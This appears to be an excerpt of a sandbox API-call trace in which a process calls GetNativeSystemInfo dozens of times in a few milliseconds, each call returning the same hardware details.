	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.712] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.713] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.714] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.715] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
